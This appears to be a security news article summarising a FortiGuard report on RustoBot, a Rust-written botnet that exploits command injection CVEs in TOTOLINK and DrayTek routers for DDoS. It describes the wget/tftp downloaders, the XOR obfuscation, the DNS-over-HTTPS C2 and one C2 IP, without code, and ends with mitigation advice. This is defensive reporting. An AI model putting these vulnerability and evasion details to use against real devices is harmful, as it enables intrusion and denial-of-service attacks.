Rust-Coded Botnet Targets Routers for Remote Command Injection

FortiGuard Labs has uncovered a sophisticated new botnet, dubbed “RustoBot,” that leverages Rust an increasingly popular systems programming language to target vulnerable network devices.

RustoBot represents a significant escalation in the tactics of cybercriminals, who are now employing Rust’s performance and cross-platform capabilities to craft more evasive, difficult-to-analyze malware.

The newly detected campaign exploits known command injection vulnerabilities in TOTOLINK routers, as well as certain DrayTek devices, allowing attackers to execute remote code and gain control over affected systems.

Vulnerability Exploitation and Infection Vector

RustoBot exploits command injection vulnerabilities such as CVE-2022-26210 and CVE-2022-26187 in the cstecgi.cgi component of TOTOLINK routers, and the recently disclosed CVE-2024-12987 in DrayTek Vigor2960 and Vigor300B devices.

Attackers deliver the malware using a suite of downloader scripts that deploy via various methods, including both wget and tftp, enabling flexible propagation across a wide range of embedded architectures specifically arm5, arm6, arm7, mips, and mpsl, with an additional x86 variant discovered.

The malware’s initial payload is distributed through compromised web servers, targeting devices in Japan, Taiwan, Vietnam, and Mexico.

Upon execution, the downloader fetches the appropriate Rust-based binary for the victim’s architecture and initiates the infection process, ultimately handing over device control to the threat actor.

Technical Execution and Obfuscation Tactics

Once installed, RustoBot employs several advanced techniques to evade detection and analysis.

Its configuration data is obfuscated using XOR-based encryption, and access to system APIs is performed via dynamic resolution through the Global Offset Table (GOT).

This evasion, combined with Rust’s inherent complexity and memory safety features, makes static and dynamic analysis significantly more challenging for defenders.

The decoded configuration enables two main attack routines: establishing contact with command-and-control (C2) servers and participating in distributed denial-of-service (DDoS) attacks.

For C2 communication, RustoBot utilizes DNS-over-HTTPS (DoH), blending malicious requests seamlessly with legitimate encrypted web traffic.

The botnet resolves several domains that all point to the same C2 infrastructure ([5.255.125.150]), increasing resiliency against takedown efforts.

RustoBot’s C2 server can issue attack commands specifying the DDoS method (UDP, TCP, or raw IP flooding), attack duration, target IP address, port, and packet size.

This precision allows attackers to craft high-impact, targeted DDoS campaigns against selected IPs or services, leveraging the bandwidth and connectivity of compromised routers.

The botnet’s structure and use of encrypted traffic also increase the risk of undetected data exfiltration or secondary attacks.

Organizations with affected TOTOLINK or DrayTek devices are at high risk and should immediately apply available firmware updates, enforce strong authentication on device management interfaces, and monitor for unauthorized or suspicious device activity.

According to the Report, FortiGuard protections are in place for known exploit vectors, and filtering network traffic to block communications with known C2 domains and IPs is strongly recommended.

Enhanced network segmentation, endpoint monitoring, and user training further reduce exploitation risk.

IoT and edge devices remain attractive, often-overlooked targets for sophisticated botnet operations such as RustoBot.

Proactive mitigation, threat intelligence, and multi-layered defense are crucial to withstand these evolving threats.

Indicators of Compromise (IOC)

Find this Story Interesting! Follow us on LinkedIn and X to Get More Instant updates